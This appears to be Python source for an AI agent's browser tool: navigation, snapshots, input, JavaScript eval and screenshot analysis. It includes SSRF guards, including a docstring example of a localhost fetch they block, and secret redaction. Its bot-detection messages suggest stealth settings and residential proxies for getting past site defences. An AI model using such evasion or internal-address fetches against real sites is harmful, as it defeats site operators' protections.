if _is_camofox_mode():
|
|
from tools.browser_camofox import camofox_navigate
|
|
return camofox_navigate(url, task_id)
|
|
|
|
if auto_local_this_nav:
|
|
logger.info(
|
|
"browser_navigate: auto-routing %s to local Chromium sidecar "
|
|
"(cloud provider %s stays on cloud for public URLs; "
|
|
"set browser.auto_local_for_private_urls: false to disable)",
|
|
url,
|
|
type(_get_cloud_provider()).__name__ if _get_cloud_provider() else "none",
|
|
)
|
|
|
|
# Get session info to check if this is a new session
|
|
# (will create one with features logged if not exists)
|
|
session_info = _get_session_info(nav_session_key)
|
|
is_first_nav = session_info.get("_first_nav", True)
|
|
|
|
# Auto-start recording if configured and this is first navigation
|
|
if is_first_nav:
|
|
session_info["_first_nav"] = False
|
|
_maybe_start_recording(nav_session_key)
|
|
|
|
result = _run_browser_command(
|
|
nav_session_key,
|
|
"open",
|
|
[url],
|
|
timeout=_get_open_command_timeout(first_open=is_first_nav),
|
|
)
|
|
|
|
if not result.get("success"):
|
|
return json.dumps({
|
|
"success": False,
|
|
"error": result.get("error", "Navigation failed")
|
|
}, ensure_ascii=False)
|
|
|
|
data = result.get("data", {})
|
|
title = data.get("title", "")
|
|
final_url = data.get("url", url)
|
|
|
|
blocked = _post_redirect_block(nav_session_key, url, final_url, auto_local_this_nav)
|
|
if blocked is not None:
|
|
return blocked
|
|
|
|
response = {
|
|
"success": True,
|
|
"url": final_url,
|
|
"title": title
|
|
}
|
|
# Auditability: stamp navigations that ran on the user's real-profile
|
|
# copy-browser so usage is visible in the tool result.
|
|
try:
|
|
if (session_info.get("features") or {}).get("real_profile"):
|
|
response["used_real_profile"] = True
|
|
except Exception:
|
|
pass
|
|
# Remember only a successful, non-blocked navigation as the task owner.
|
|
# Failed opens and blocked redirects must not retarget follow-up clicks
|
|
# or snapshots to a newly-created but irrelevant session.
|
|
_last_active_session_key[effective_task_id] = nav_session_key
|
|
_copy_fallback_warning(response, result)
|
|
|
|
title_lower = title.lower()
|
|
if any(pattern in title_lower for pattern in _BOT_DETECTION_TITLE_PATTERNS):
|
|
response["bot_detection_warning"] = (
|
|
f"Page title '{title}' suggests bot detection. The site may have blocked this request. "
|
|
"Options: 1) Try adding delays between actions, 2) Access different pages first, "
|
|
"3) Enable advanced stealth (BROWSERBASE_ADVANCED_STEALTH=true, requires Scale plan), "
|
|
"4) Some sites have very aggressive bot detection that may be unavoidable."
|
|
)
|
|
|
|
# Include feature info on first navigation so model knows what's active
|
|
if is_first_nav and "features" in session_info:
|
|
features = session_info["features"]
|
|
active_features = [k for k, v in features.items() if v]
|
|
if not features.get("proxies"):
|
|
response["stealth_warning"] = (
|
|
"Running WITHOUT residential proxies. Bot detection may be more aggressive. "
|
|
"Consider upgrading Browserbase plan for proxy support."
|
|
)
|
|
response["stealth_features"] = active_features
|
|
|
|
_attach_auto_snapshot(response, nav_session_key)
|
|
return json.dumps(response, ensure_ascii=False)
|
|
|
|
|
|
def browser_snapshot(
|
|
full: bool = False,
|
|
task_id: Optional[str] = None,
|
|
user_task: Optional[str] = None
|
|
) -> str:
|
|
"""Text snapshot of the page's accessibility tree (compact unless ``full``).
|
|
|
|
``user_task`` is deprecated and unused: oversized snapshots always
|
|
truncate-and-store (no LLM pass).
|
|
"""
|
|
if _is_camofox_mode():
|
|
from tools.browser_camofox import camofox_snapshot
|
|
return camofox_snapshot(full, task_id)
|
|
|
|
effective_task_id = _last_session_key(task_id or "default")
|
|
|
|
# Build command args based on full flag
|
|
args = []
|
|
if not full:
|
|
args.extend(["-c"]) # Compact mode
|
|
|
|
result = _run_browser_command(effective_task_id, "snapshot", args)
|
|
|
|
if result.get("success"):
|
|
data = result.get("data", {})
|
|
snapshot_text = data.get("snapshot", "")
|
|
refs = data.get("refs", {})
|
|
|
|
# ── Private-network guard: block snapshots from eval-navigated private pages ──
|
|
blocked = _blocked_private_page_content(effective_task_id)
|
|
if blocked is not None:
|
|
return blocked
|
|
|
|
# Oversized snapshots truncate at line boundaries; the full
|
|
# accessibility tree is stored to cache/web and the appended note
|
|
# tells the agent how to page through it with read_file (same
|
|
# pattern as web_extract — no LLM summarization). Threshold is
|
|
# configurable via browser.snapshot_threshold.
|
|
threshold = get_browser_snapshot_threshold()
|
|
if len(snapshot_text) > threshold:
|
|
snapshot_text = _truncate_snapshot(snapshot_text, max_chars=threshold)
|
|
|
|
response = {
|
|
"success": True,
|
|
"snapshot": _redact_browser_output(snapshot_text),
|
|
"element_count": len(refs) if refs else 0
|
|
}
|
|
_copy_fallback_warning(response, result)
|
|
|
|
# Merge supervisor state (pending dialogs + frame tree) when a CDP
|
|
# supervisor is attached to this task. No-op otherwise. See
|
|
# website/docs/developer-guide/browser-supervisor.md.
|
|
try:
|
|
from tools.browser_supervisor import SUPERVISOR_REGISTRY # type: ignore[import-not-found]
|
|
_supervisor = SUPERVISOR_REGISTRY.get(effective_task_id)
|
|
if _supervisor is not None:
|
|
_sv_snap = _supervisor.snapshot()
|
|
if _sv_snap.active:
|
|
response.update(_redact_browser_output(_sv_snap.to_dict()))
|
|
except Exception as _sv_exc:
|
|
logger.debug("supervisor snapshot merge failed: %s", _sv_exc)
|
|
|
|
return json.dumps(response, ensure_ascii=False)
|
|
else:
|
|
response = {
|
|
"success": False,
|
|
"error": result.get("error", "Failed to get snapshot")
|
|
}
|
|
return json.dumps(_copy_fallback_warning(response, result), ensure_ascii=False)
|
|
|
|
|
|
def _tool_response(result: Dict[str, Any], ok: Dict[str, Any], default_error: str) -> str:
|
|
"""Standard tool JSON for a ``_run_browser_command`` result.
|
|
|
|
Success → ``{"success": True, **ok}``; failure → ``{"success": False,
|
|
"error": result.error or default_error}``. Lightpanda fallback metadata
|
|
is copied onto either shape.
|
|
"""
|
|
if result.get("success"):
|
|
response = {"success": True, **ok}
|
|
else:
|
|
response = {"success": False, "error": result.get("error", default_error)}
|
|
return json.dumps(_copy_fallback_warning(response, result), ensure_ascii=False)
|
|
|
|
|
|
def browser_click(ref: str, task_id: Optional[str] = None) -> str:
|
|
"""Click the element ``ref`` (e.g. "@e5")."""
|
|
if _is_camofox_mode():
|
|
from tools.browser_camofox import camofox_click
|
|
return camofox_click(ref, task_id)
|
|
|
|
effective_task_id = _last_session_key(task_id or "default")
|
|
blocked = _blocked_private_page_action(effective_task_id, "click")
|
|
if blocked is not None:
|
|
return blocked
|
|
|
|
if not ref.startswith("@"):
|
|
ref = f"@{ref}"
|
|
result = _run_browser_command(effective_task_id, "click", [ref])
|
|
return _tool_response(result, {"clicked": ref}, f"Failed to click {ref}")
|
|
|
|
|
|
def browser_type(ref: str, text: str, task_id: Optional[str] = None) -> str:
|
|
"""Type ``text`` into the element ``ref`` (fill: clears, then types)."""
|
|
if _is_camofox_mode():
|
|
from tools.browser_camofox import camofox_type
|
|
return camofox_type(ref, text, task_id)
|
|
|
|
effective_task_id = _last_session_key(task_id or "default")
|
|
blocked = _blocked_private_page_action(effective_task_id, "type")
|
|
if blocked is not None:
|
|
return blocked
|
|
|
|
if not ref.startswith("@"):
|
|
ref = f"@{ref}"
|
|
# fill clears then types
|
|
result = _run_browser_command(effective_task_id, "fill", [ref, text])
|
|
|
|
from agent.display import (
|
|
redact_browser_typed_text_for_display,
|
|
redact_tool_args_for_display,
|
|
)
|
|
|
|
# Typed text goes through the secret-pattern redactor so API keys / tokens
|
|
# don't leak into tool progress or chat history (the raw value was already
|
|
# sent to the browser above); normal text passes through unchanged.
|
|
display_text = (redact_tool_args_for_display("browser_type", {"text": text}) or {})["text"]
|
|
if result.get("success"):
|
|
response = {"success": True, "typed": display_text, "element": ref}
|
|
else:
|
|
response = {"success": False, "error": result.get("error", f"Failed to type into {ref}")}
|
|
response = _copy_fallback_warning(response, result)
|
|
response = redact_browser_typed_text_for_display(response, text)
|
|
return json.dumps(response, ensure_ascii=False)
|
|
|
|
|
|
def browser_scroll(direction: str, task_id: Optional[str] = None) -> str:
|
|
"""Scroll the page ``direction`` ("up"/"down") by about half a viewport."""
|
|
if direction not in {"up", "down"}:
|
|
return json.dumps({
|
|
"success": False,
|
|
"error": f"Invalid direction '{direction}'. Use 'up' or 'down'."
|
|
}, ensure_ascii=False)
|
|
|
|
# Single scroll with a pixel amount (~half a viewport) instead of 5x subprocess calls.
|
|
_SCROLL_PIXELS = 500
|
|
|
|
if _is_camofox_mode():
|
|
from tools.browser_camofox import camofox_scroll
|
|
# Camofox REST API doesn't support pixel args; use repeated calls
|
|
_SCROLL_REPEATS = 5
|
|
result = None
|
|
for _ in range(_SCROLL_REPEATS):
|
|
result = camofox_scroll(direction, task_id)
|
|
return result
|
|
|
|
effective_task_id = _last_session_key(task_id or "default")
|
|
result = _run_browser_command(effective_task_id, "scroll", [direction, str(_SCROLL_PIXELS)])
|
|
return _tool_response(result, {"scrolled": direction}, f"Failed to scroll {direction}")
|
|
|
|
|
|
def browser_back(task_id: Optional[str] = None) -> str:
|
|
"""Navigate back in browser history."""
|
|
if _is_camofox_mode():
|
|
from tools.browser_camofox import camofox_back
|
|
return camofox_back(task_id)
|
|
|
|
effective_task_id = _last_session_key(task_id or "default")
|
|
result = _run_browser_command(effective_task_id, "back", [])
|
|
|
|
if result.get("success") and _eval_ssrf_guard_active(effective_task_id):
|
|
# History can land on a private/internal/cloud-metadata address the
|
|
# navigate preflight never saw (earlier redirect chain, manipulated
|
|
# client-side history). Re-check post-navigation like every other
|
|
# content-returning entry point — the floor fires for every backend.
|
|
_blocked_url = _current_page_private_url(effective_task_id)
|
|
if _blocked_url:
|
|
return json.dumps({
|
|
"success": False,
|
|
"error": (
|
|
"Blocked: page URL targets a private or internal address "
|
|
f"({_blocked_url}). Browser history navigation (back) "
|
|
"landed on this address."
|
|
),
|
|
}, ensure_ascii=False)
|
|
return _tool_response(result, {"url": result.get("data", {}).get("url", "")}, "Failed to go back")
|
|
|
|
|
|
def browser_press(key: str, task_id: Optional[str] = None) -> str:
|
|
"""Press a keyboard key (e.g. "Enter", "Tab")."""
|
|
if _is_camofox_mode():
|
|
from tools.browser_camofox import camofox_press
|
|
return camofox_press(key, task_id)
|
|
|
|
effective_task_id = _last_session_key(task_id or "default")
|
|
blocked = _blocked_private_page_action(effective_task_id, "press")
|
|
if blocked is not None:
|
|
return blocked
|
|
result = _run_browser_command(effective_task_id, "press", [key])
|
|
return _tool_response(result, {"pressed": key}, f"Failed to press {key}")
|
|
|
|
|
|
def _blocked_private_page_action(effective_task_id: str, action: str) -> Optional[str]:
|
|
"""Return a blocked payload when an unsafe cloud page would receive input."""
|
|
if not _eval_ssrf_guard_active(effective_task_id):
|
|
return None
|
|
blocked_url = _current_page_private_url(effective_task_id)
|
|
if not blocked_url:
|
|
return None
|
|
return json.dumps({
|
|
"success": False,
|
|
"error": (
|
|
"Blocked: page URL targets a private or internal address "
|
|
f"({blocked_url}). Refusing to {action} on this page in this "
|
|
"browser mode."
|
|
),
|
|
}, ensure_ascii=False)
|
|
|
|
|
|
def _blocked_private_page_json(blocked_url: str) -> str:
|
|
"""Blocked payload for content-returning tools whose page was eval-navigated private."""
|
|
return json.dumps({
|
|
"success": False,
|
|
"error": (
|
|
"Blocked: page URL targets a private or internal address "
|
|
f"({blocked_url}). This may have been caused by a "
|
|
"JavaScript navigation via browser_console."
|
|
),
|
|
}, ensure_ascii=False)
|
|
|
|
|
|
def _blocked_private_page_content(effective_task_id: str) -> Optional[str]:
|
|
"""Blocked payload when the SSRF guard is active and the current page is private, else None.
|
|
|
|
Sibling of the snapshot/vision/eval/get_images guards: after any eval that
|
|
may have changed ``location.href`` to a private address, returning page
|
|
content would expose it. Fail-open on probe failure (see
|
|
``_current_page_private_url``).
|
|
"""
|
|
if not _eval_ssrf_guard_active(effective_task_id):
|
|
return None
|
|
blocked_url = _current_page_private_url(effective_task_id)
|
|
return _blocked_private_page_json(blocked_url) if blocked_url else None
|
|
|
|
|
|
def browser_console(clear: bool = False, expression: Optional[str] = None, task_id: Optional[str] = None) -> str:
|
|
"""Console messages + uncaught JS errors (optionally ``clear``ing the buffers),
|
|
or — when ``expression`` is given — evaluate JS in the page like the DevTools console."""
|
|
# --- JS evaluation mode ---
|
|
if expression is not None:
|
|
policy_error = _enforce_browser_eval_policy(expression)
|
|
if policy_error:
|
|
return json.dumps({"success": False, "error": policy_error}, ensure_ascii=False)
|
|
return _browser_eval(expression, task_id)
|
|
|
|
# --- Console output mode (original behaviour) ---
|
|
if _is_camofox_mode():
|
|
from tools.browser_camofox import camofox_console
|
|
return camofox_console(clear, task_id)
|
|
|
|
effective_task_id = _last_session_key(task_id or "default")
|
|
|
|
blocked = _blocked_private_page_content(effective_task_id)
|
|
if blocked is not None:
|
|
return blocked
|
|
|
|
console_args = ["--clear"] if clear else []
|
|
error_args = ["--clear"] if clear else []
|
|
|
|
console_result = _run_browser_command(effective_task_id, "console", console_args)
|
|
errors_result = _run_browser_command(effective_task_id, "errors", error_args)
|
|
|
|
messages = []
|
|
if console_result.get("success"):
|
|
for msg in console_result.get("data", {}).get("messages", []):
|
|
messages.append({
|
|
"type": msg.get("type", "log"),
|
|
"text": _redact_browser_output(msg.get("text", "")),
|
|
"source": "console",
|
|
})
|
|
|
|
errors = []
|
|
if errors_result.get("success"):
|
|
for err in errors_result.get("data", {}).get("errors", []):
|
|
errors.append({
|
|
"message": _redact_browser_output(err.get("message", "")),
|
|
"source": "exception",
|
|
})
|
|
|
|
response = {
|
|
"success": True,
|
|
"console_messages": messages,
|
|
"js_errors": errors,
|
|
"total_messages": len(messages),
|
|
"total_errors": len(errors),
|
|
}
|
|
_copy_fallback_warning(response, console_result)
|
|
if errors_result.get("fallback_warning") and not response.get("fallback_warning"):
|
|
_copy_fallback_warning(response, errors_result)
|
|
return json.dumps(response, ensure_ascii=False)
|
|
|
|
|
|
from tools.browser_tool_eval_policy import ( # noqa: F401
|
|
_eval_ssrf_guard_active,
|
|
_JS_URL_LITERAL_RE,
|
|
_expression_targets_private_url,
|
|
_current_page_private_url,
|
|
_RISKY_BROWSER_EVAL_PATTERNS,
|
|
_JS_STRING_LITERAL_RE,
|
|
_SENSITIVE_BROWSER_EVAL_TOKENS,
|
|
_allow_unsafe_browser_evaluate,
|
|
_restrict_browser_evaluate,
|
|
_decode_js_string_literal,
|
|
_decoded_js_string_literals,
|
|
_sensitive_browser_eval_token_reason,
|
|
_risky_browser_eval_reason,
|
|
_enforce_browser_eval_policy,
|
|
_camofox_current_page_private_url,
|
|
)
|
|
|
|
|
|
def _parse_eval_value(raw_result: Any) -> Any:
|
|
"""Eval returns the JS value as a string; parse valid JSON so the model gets structured data."""
|
|
if isinstance(raw_result, str):
|
|
try:
|
|
return json.loads(raw_result)
|
|
except (json.JSONDecodeError, ValueError):
|
|
pass # keep as string
|
|
return raw_result
|
|
|
|
|
|
def _eval_supervisor_fast_path(effective_task_id: str, expression: str) -> Optional[str]:
|
|
"""Run ``Runtime.evaluate`` on the CDP supervisor's persistent WebSocket.
|
|
|
|
Zero subprocess startup cost vs spawning ``agent-browser eval``. Returns a
|
|
tool JSON string when the supervisor produced a definitive answer (a value,
|
|
a blocked private page, or a real JS-side exception — which is NOT retried
|
|
through the subprocess, that would just reproduce it slower), or None to
|
|
fall through to the subprocess path (no supervisor, supervisor-side failure,
|
|
import error), so behaviour is unchanged when no supervisor is running.
|
|
"""
|
|
try:
|
|
from tools.browser_supervisor import SUPERVISOR_REGISTRY # type: ignore[import-not-found]
|
|
supervisor = SUPERVISOR_REGISTRY.get(effective_task_id)
|
|
if supervisor is None:
|
|
return None
|
|
sup_result = supervisor.evaluate_runtime(expression)
|
|
if sup_result.get("ok"):
|
|
parsed = _parse_eval_value(sup_result.get("result"))
|
|
# Post-eval page-URL recheck: if this (or a prior) eval navigated
|
|
# the page to a private address, withhold the result.
|
|
blocked = _blocked_private_page_content(effective_task_id)
|
|
if blocked is not None:
|
|
return blocked
|
|
response = {
|
|
"success": True,
|
|
"result": _redact_browser_output(parsed),
|
|
"result_type": type(parsed).__name__,
|
|
"method": "cdp_supervisor",
|
|
}
|
|
return json.dumps(response, ensure_ascii=False, default=str)
|
|
err = sup_result.get("error") or "evaluate_runtime failed"
|
|
if "supervisor" not in err.lower():
|
|
return json.dumps({"success": False, "error": err}, ensure_ascii=False)
|
|
logger.debug(
|
|
"browser_eval: supervisor path unavailable (%s), falling back to subprocess",
|
|
err,
|
|
)
|
|
except ImportError:
|
|
pass
|
|
except Exception as exc: # pragma: no cover — defensive
|
|
logger.debug("browser_eval: supervisor path errored (%s), falling back", exc)
|
|
return None
|
|
|
|
|
|
def _eval_failure_response(result: Dict[str, Any]) -> str:
|
|
"""Tool JSON for a failed ``agent-browser eval``, with actionable rewrites of known errors."""
|
|
err = result.get("error", "eval failed")
|
|
if any(hint in err.lower() for hint in ("unknown command", "not supported", "not found", "no such command")):
|
|
# Backend capability gap — give the model a clear signal.
|
|
err = f"JavaScript evaluation is not supported by this browser backend. {err}"
|
|
elif "reference chain is too long" in err.lower():
|
|
# A live DOM node / NodeList / Window can't be JSON-serialized by CDP.
|
|
# The supervisor fast path retries with returnByValue=false; the CLI
|
|
# subprocess can't, so replace the cryptic protocol error with guidance.
|
|
err = (
|
|
"Expression returned a live DOM node / NodeList / Window, "
|
|
"which can't be serialized. Extract a primitive value "
|
|
"(e.g. .innerText, .href, .src, .value) or use "
|
|
"JSON.stringify() / a snapshot tool instead."
|
|
)
|
|
return json.dumps(_copy_fallback_warning({"success": False, "error": err}, result))
|
|
|
|
|
|
def _browser_eval(expression: str, task_id: Optional[str] = None) -> str:
|
|
"""Evaluate a JavaScript expression in the page context and return the result.
|
|
|
|
Private-network guard, both sub-paths gated on the same condition: the
|
|
literal pre-scan closes direct fetches (``fetch('http://127.0.0.1/...')``,
|
|
which never update ``location.href``); the post-eval page-URL recheck
|
|
closes navigate-then-read (``location.href = ...`` then read the DOM) —
|
|
eval returns arbitrary JS results directly, never via snapshot/vision.
|
|
"""
|
|
effective_task_id = _last_session_key(task_id or "default")
|
|
|
|
if _eval_ssrf_guard_active(effective_task_id):
|
|
blocked_literal = _expression_targets_private_url(expression)
|
|
if blocked_literal:
|
|
return json.dumps({
|
|
"success": False,
|
|
"error": (
|
|
"Blocked: JavaScript expression targets a private or "
|
|
f"internal address ({blocked_literal}). Reading internal "
|
|
"endpoints via browser_console is not permitted in this "
|
|
"browser mode."
|
|
),
|
|
}, ensure_ascii=False)
|
|
|
|
# Camofox keeps its own raw-``task_id``-keyed session map, so pass the raw
|
|
# id (matching every other Camofox tool) rather than the resolved
|
|
# agent-browser session key. The literal pre-scan above already ran.
|
|
if _is_camofox_mode():
|
|
return _camofox_eval(expression, task_id)
|
|
|
|
fast = _eval_supervisor_fast_path(effective_task_id, expression)
|
|
if fast is not None:
|
|
return fast
|
|
|
|
result = _run_browser_command(effective_task_id, "eval", [expression])
|
|
if not result.get("success"):
|
|
return _eval_failure_response(result)
|
|
|
|
parsed = _parse_eval_value(result.get("data", {}).get("result"))
|
|
response = {
|
|
"success": True,
|
|
"result": _redact_browser_output(parsed),
|
|
"result_type": type(parsed).__name__,
|
|
}
|
|
# Post-eval page-URL recheck (mirrors the supervisor path).
|
|
blocked = _blocked_private_page_content(effective_task_id)
|
|
if blocked is not None:
|
|
return blocked
|
|
return json.dumps(_copy_fallback_warning(response, result), ensure_ascii=False, default=str)
|
|
|
|
|
|
def _camofox_eval(expression: str, task_id: Optional[str] = None) -> str:
|
|
"""Evaluate JS via Camofox's /tabs/{tab_id}/evaluate endpoint (if available)."""
|
|
from tools.browser_camofox import _ensure_tab, _post
|
|
try:
|
|
tab_info = _ensure_tab(task_id or "default")
|
|
tab_id = tab_info.get("tab_id") or tab_info.get("id")
|
|
user_id = tab_info["user_id"]
|
|
resp = _post(f"/tabs/{tab_id}/evaluate", body={"expression": expression, "userId": user_id})
|
|
|
|
# Camofox returns the result in a JSON envelope
|
|
raw_result = resp.get("result") if isinstance(resp, dict) else resp
|
|
parsed = raw_result
|
|
if isinstance(raw_result, str):
|
|
try:
|
|
parsed = json.loads(raw_result)
|
|
except (json.JSONDecodeError, ValueError):
|
|
pass
|
|
|
|
if _eval_ssrf_guard_active(task_id or "default"):
|
|
_blocked_url = _camofox_current_page_private_url(tab_id, user_id)
|
|
if _blocked_url:
|
|
return _blocked_private_page_json(_blocked_url)
|
|
|
|
return json.dumps({
|
|
"success": True,
|
|
"result": _redact_browser_output(parsed),
|
|
"result_type": type(parsed).__name__,
|
|
}, ensure_ascii=False, default=str)
|
|
except Exception as e:
|
|
error_msg = str(e)
|
|
# Graceful degradation — server may not support eval
|
|
if any(code in error_msg for code in ("404", "405", "501")):
|
|
return json.dumps({
|
|
"success": False,
|
|
"error": "JavaScript evaluation is not supported by this Camofox server. "
|
|
"Use browser_snapshot or browser_vision to inspect page state.",
|
|
})
|
|
return tool_error(error_msg, success=False)
|
|
|
|
|
|
def _maybe_start_recording(task_id: str):
|
|
"""Start recording if browser.record_sessions is enabled in config."""
|
|
with _cleanup_lock:
|
|
if task_id in _recording_sessions:
|
|
return
|
|
try:
|
|
from hermes_cli.config import read_raw_config
|
|
hermes_home = get_hermes_home()
|
|
cfg = read_raw_config()
|
|
record_enabled = cfg_get(cfg, "browser", "record_sessions", default=False)
|
|
|
|
if not record_enabled:
|
|
return
|
|
|
|
recordings_dir = hermes_home / "browser_recordings"
|
|
recordings_dir.mkdir(parents=True, exist_ok=True)
|
|
_cleanup_old_recordings(max_age_hours=72)
|
|
|
|
timestamp = time.strftime("%Y%m%d_%H%M%S")
|
|
recording_path = recordings_dir / f"session_{timestamp}_{task_id[:16]}.webm"
|
|
|
|
result = _run_browser_command(task_id, "record", ["start", str(recording_path)])
|
|
if result.get("success"):
|
|
with _cleanup_lock:
|
|
_recording_sessions.add(task_id)
|
|
logger.info("Auto-recording browser session %s to %s", task_id, recording_path)
|
|
else:
|
|
logger.debug("Could not start auto-recording: %s", result.get("error"))
|
|
except Exception as e:
|
|
logger.debug("Auto-recording setup failed: %s", e)
|
|
|
|
|
|
def _maybe_stop_recording(task_id: str):
|
|
"""Stop recording if one is active for this session."""
|
|
with _cleanup_lock:
|
|
if task_id not in _recording_sessions:
|
|
return
|
|
try:
|
|
result = _run_browser_command(task_id, "record", ["stop"])
|
|
if result.get("success"):
|
|
path = result.get("data", {}).get("path", "")
|
|
logger.info("Saved browser recording for session %s: %s", task_id, path)
|
|
except Exception as e:
|
|
logger.debug("Could not stop recording for %s: %s", task_id, e)
|
|
finally:
|
|
with _cleanup_lock:
|
|
_recording_sessions.discard(task_id)
|
|
|
|
|
|
def browser_get_images(task_id: Optional[str] = None) -> str:
|
|
"""List the page's images (src, alt, natural size), excluding data: URIs."""
|
|
if _is_camofox_mode():
|
|
from tools.browser_camofox import camofox_get_images
|
|
return camofox_get_images(task_id)
|
|
|
|
effective_task_id = _last_session_key(task_id or "default")
|
|
|
|
# Use eval to run JavaScript that extracts images
|
|
js_code = """JSON.stringify(
|
|
[...document.images].map(img => ({
|
|
src: img.src,
|
|
alt: img.alt || '',
|
|
width: img.naturalWidth,
|
|
height: img.naturalHeight
|
|
})).filter(img => img.src && !img.src.startsWith('data:'))
|
|
)"""
|
|
|
|
result = _run_browser_command(effective_task_id, "eval", [js_code])
|
|
|
|
if result.get("success"):
|
|
# ── Private-network guard (sibling of snapshot/vision/eval guards) ──
|
|
blocked = _blocked_private_page_content(effective_task_id)
|
|
if blocked is not None:
|
|
return blocked
|
|
|
|
data = result.get("data", {})
|
|
raw_result = data.get("result", "[]")
|
|
|
|
try:
|
|
# Parse the JSON string returned by JavaScript
|
|
if isinstance(raw_result, str):
|
|
images = json.loads(raw_result)
|
|
else:
|
|
images = raw_result
|
|
|
|
response = {
|
|
"success": True,
|
|
"images": _redact_browser_output(images),
|
|
"count": len(images)
|
|
}
|
|
return json.dumps(_copy_fallback_warning(response, result), ensure_ascii=False)
|
|
except json.JSONDecodeError:
|
|
response = {
|
|
"success": True,
|
|
"images": [],
|
|
"count": 0,
|
|
"warning": "Could not parse image data"
|
|
}
|
|
return json.dumps(_copy_fallback_warning(response, result), ensure_ascii=False)
|
|
else:
|
|
response = {
|
|
"success": False,
|
|
"error": result.get("error", "Failed to get images")
|
|
}
|
|
return json.dumps(_copy_fallback_warning(response, result), ensure_ascii=False)
|
|
|
|
|
|
_LP_VISION_FALLBACK_REASON = (
|
|
"Lightpanda has no graphical renderer for screenshots; used Chrome for vision capture."
|
|
)
|
|
|
|
|
|
def _vision_mode_label() -> str:
|
|
_cp = _get_cloud_provider()
|
|
return "local" if _cp is None else f"cloud ({_cp.provider_name()})"
|
|
|
|
|
|
def _lightpanda_vision_preroute(
|
|
effective_task_id: str, annotate: bool, screenshot_path: Path,
|
|
) -> Tuple[bool, Optional[str], Path]:
|
|
"""Capture the vision screenshot through the Chrome fallback when Lightpanda is the engine.
|
|
|
|
Lightpanda has no graphical renderer, so the normal path would fail with a
|
|
CDP error or return a placeholder PNG. Returns ``(prerouted, fallback_warning,
|
|
screenshot_path)``; on fallback failure ``prerouted`` is False and the caller
|
|
takes the normal screenshot path (forcing Chrome) so ``_run_browser_command``
|
|
still produces the standard fallback metadata/error.
|
|
"""
|
|
engine = _get_browser_engine()
|
|
if engine != "lightpanda" or not _should_inject_engine(engine):
|
|
return False, None, screenshot_path
|
|
logger.debug("browser_vision: pre-routing screenshot to Chrome (engine=lightpanda)")
|
|
screenshot_args = ["--annotate"] if annotate else []
|
|
fb_result = _chrome_fallback_screenshot(effective_task_id, screenshot_args, _get_command_timeout())
|
|
fb_result = _annotate_lightpanda_fallback(fb_result, _LP_VISION_FALLBACK_REASON)
|
|
if not fb_result.get("success"):
|
|
logger.warning("Lightpanda Chrome fallback vision screenshot failed: %s", fb_result.get("error"))
|
|
return False, None, screenshot_path
|
|
fb_path = fb_result.get("data", {}).get("path", "")
|
|
if fb_path and os.path.exists(fb_path):
|
|
import uuid as uuid_mod
|
|
from hermes_constants import get_hermes_dir
|
|
|
|
screenshots_dir = get_hermes_dir("cache/screenshots", "browser_screenshots")
|
|
screenshots_dir.mkdir(parents=True, exist_ok=True)
|
|
persistent_path = screenshots_dir / f"browser_screenshot_{uuid_mod.uuid4().hex}.png"
|
|
shutil.copy2(fb_path, persistent_path)
|
|
screenshot_path = persistent_path
|
|
return True, fb_result.get("fallback_warning"), screenshot_path
|
|
|
|
|
|
def _native_vision_result(
|
|
screenshot_path: Path, question: str, annotate: bool,
|
|
result: Dict[str, Any], lp_fallback_warning: Optional[str],
|
|
) -> Dict[str, Any]:
|
|
"""Multimodal tool-result envelope: the main model inspects the pixels itself.
|
|
|
|
History-reuse cap: this embed is baked into the tool result and re-sent on
|
|
every later turn, exactly like vision_analyze's native path — apply the same
|
|
proactive resize so full-res screenshots can't enter immutable history
|
|
uncapped. The helper's stat/dimension quick-estimate skips the resize when
|
|
already under both caps; without Pillow it fails open to the raw bytes.
|
|
"""
|
|
from tools.vision_tools import (
|
|
_EMBED_MAX_DIMENSION,
|
|
_EMBED_TARGET_BYTES,
|
|
_build_native_vision_tool_result,
|
|
_resize_image_for_vision,
|
|
)
|
|
|
|
data_url = _resize_image_for_vision(
|
|
screenshot_path,
|
|
mime_type="image/png",
|
|
max_base64_bytes=_EMBED_TARGET_BYTES,
|
|
max_dimension=_EMBED_MAX_DIMENSION,
|
|
force_jpeg=True,
|
|
)
|
|
native_result = _build_native_vision_tool_result(
|
|
image_url=str(screenshot_path),
|
|
question=question,
|
|
image_data_url=data_url,
|
|
image_size_bytes=screenshot_path.stat().st_size,
|
|
)
|
|
meta = native_result.setdefault("meta", {})
|
|
meta["screenshot_path"] = str(screenshot_path)
|
|
if lp_fallback_warning:
|
|
meta["fallback_warning"] = lp_fallback_warning
|
|
if annotate and result.get("data", {}).get("annotations"):
|
|
meta["annotations"] = result["data"]["annotations"]
|
|
native_result["text_summary"] = (
|
|
f"{native_result.get('text_summary', '')} "
|
|
f"Screenshot path: {screenshot_path}"
|
|
).strip()
|
|
return native_result
|
|
|
|
|
|
def _analyze_screenshot_with_aux_llm(screenshot_path: Path, question: str) -> str:
|
|
"""One-shot aux vision-LLM analysis (not baked into history), secret-redacted.
|
|
|
|
Encodes at full resolution; on a size-related provider rejection the image
|
|
is downscaled once and retried. Timeout/temperature come from
|
|
``auxiliary.vision.*`` — local vision models (llama.cpp, ollama) can take
|
|
well over 30s, so the default timeout is generous.
|
|
"""
|
|
import base64
|
|
|
|
vision_prompt = (
|
|
f"You are analyzing a screenshot of a web browser.\n\n"
|
|
f"User's question: {question}\n\n"
|
|
f"Provide a detailed and helpful answer based on what you see in the screenshot. "
|
|
f"If there are interactive elements, describe them. If there are verification challenges "
|
|
f"or CAPTCHAs, describe what type they are and what action might be needed. "
|
|
f"Focus on answering the user's specific question."
|
|
)
|
|
_screenshot_bytes = screenshot_path.read_bytes()
|
|
_screenshot_b64 = base64.b64encode(_screenshot_bytes).decode("ascii")
|
|
data_url = f"data:image/png;base64,{_screenshot_b64}"
|
|
vision_model = _get_vision_model()
|
|
logger.debug("browser_vision: analysing screenshot (%d bytes)",
|
|
len(_screenshot_bytes))
|
|
|
|
vision_timeout = 120.0
|
|
vision_temperature = 0.1
|
|
try:
|
|
from hermes_cli.config import load_config
|
|
_vision_cfg = cfg_get(load_config(), "auxiliary", "vision", default={})
|
|
_vt = _vision_cfg.get("timeout")
|
|
if _vt is not None:
|
|
vision_timeout = float(_vt)
|
|
_vtemp = _vision_cfg.get("temperature")
|
|
if _vtemp is not None:
|
|
vision_temperature = float(_vtemp)
|
|
except Exception:
|
|
pass
|
|
|
|
call_kwargs = {
|
|
"task": "vision",
|
|
"messages": [
|
|
{
|
|
"role": "user",
|
|
"content": [
|
|
{"type": "text", "text": vision_prompt},
|
|
{"type": "image_url", "image_url": {"url": data_url}},
